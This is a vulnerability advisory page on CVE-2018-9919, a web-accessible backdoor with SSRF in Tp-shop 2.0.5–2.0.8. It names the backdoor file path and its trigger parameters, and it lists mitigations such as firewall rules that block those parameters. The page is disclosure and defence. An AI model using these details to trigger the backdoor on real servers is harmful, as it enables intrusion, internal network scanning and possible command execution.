CVE-2018-9919 in Tp-shop
Summary
by MITRE
A web-accessible backdoor, with resultant SSRF, exists in Tp-shop 2.0.5 through 2.0.8, which allows remote attackers to obtain sensitive information, attack intranet hosts, or possibly trigger remote command execution, because /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php writes data from the "down_url" URL into the "bddlj" local file if the attacker knows the backdoor "jmmy" parameter.
If you want to get the best quality for vulnerability data then you always have to consider VulDB.
Analysis
by VulDB Data Team • 02/02/2020
The vulnerability identified as CVE-2018-9919 represents a critical security flaw in Tp-shop versions 2.0.5 through 2.0.8 that exposes a web-accessible backdoor mechanism. This backdoor operates through a specific file path that allows attackers to manipulate the application's behavior by exploiting a combination of insecure file handling and server-side request forgery vulnerabilities. The flaw exists in the phpDocumentor reflection-docblock component where the system processes external URLs without proper validation or sanitization, creating a dangerous attack vector that can be exploited remotely.
The technical implementation of this vulnerability involves a specific PHP file path /vendor/phpdocumentor/reflection-docblock/tests/phpDocumentor/Reflection/DocBlock/Tag/LinkTagTeet.php which contains logic that accepts attacker-controlled data through the "down_url" parameter. When an attacker provides a malicious URL through this parameter, the system writes the content directly to a local file named "bddlj" without any verification of the source or content integrity. This file writing operation occurs when the attacker successfully passes the backdoor authentication parameter "jmmy" which acts as a key to unlock the vulnerable functionality.
The operational impact of this vulnerability extends beyond simple information disclosure to include potential remote command execution capabilities. Attackers can leverage this backdoor to perform server-side request forgery attacks that allow them to access internal network resources that would normally be protected from external access. This SSRF capability enables attackers to scan internal systems, potentially gaining access to databases, internal services, or other sensitive infrastructure components that are not directly exposed to the internet. The vulnerability essentially provides attackers with a gateway to internal network reconnaissance and exploitation activities.
The security implications of this vulnerability align with CWE-20, which describes improper input validation, and CWE-918, which covers server-side request forgery. From an ATT&CK framework perspective, this vulnerability maps to T1105 (Ingress Tool Transfer) and T1059 (Command and Scripting Interpreter) as attackers can upload malicious files and execute commands on the compromised system. The backdoor functionality also relates to T1078 (Valid Accounts) and T1566 (Phishing) as it provides persistent access mechanisms that could be used to establish long-term presence within target networks.
Organizations affected by this vulnerability should implement immediate mitigations including patching to versions beyond 2.0.8 where the backdoor functionality has been removed or properly secured. Network segmentation should be implemented to limit access to vulnerable systems, and web application firewalls should be configured to block requests containing suspicious parameters like "down_url" and "jmmy". Additionally, regular security scanning should be conducted to identify any unauthorized modifications to the affected application components, and access controls should be tightened to ensure only authorized personnel can modify critical application files. The vulnerability demonstrates the importance of proper input validation and secure file handling practices in preventing attackers from manipulating application behavior through crafted external inputs.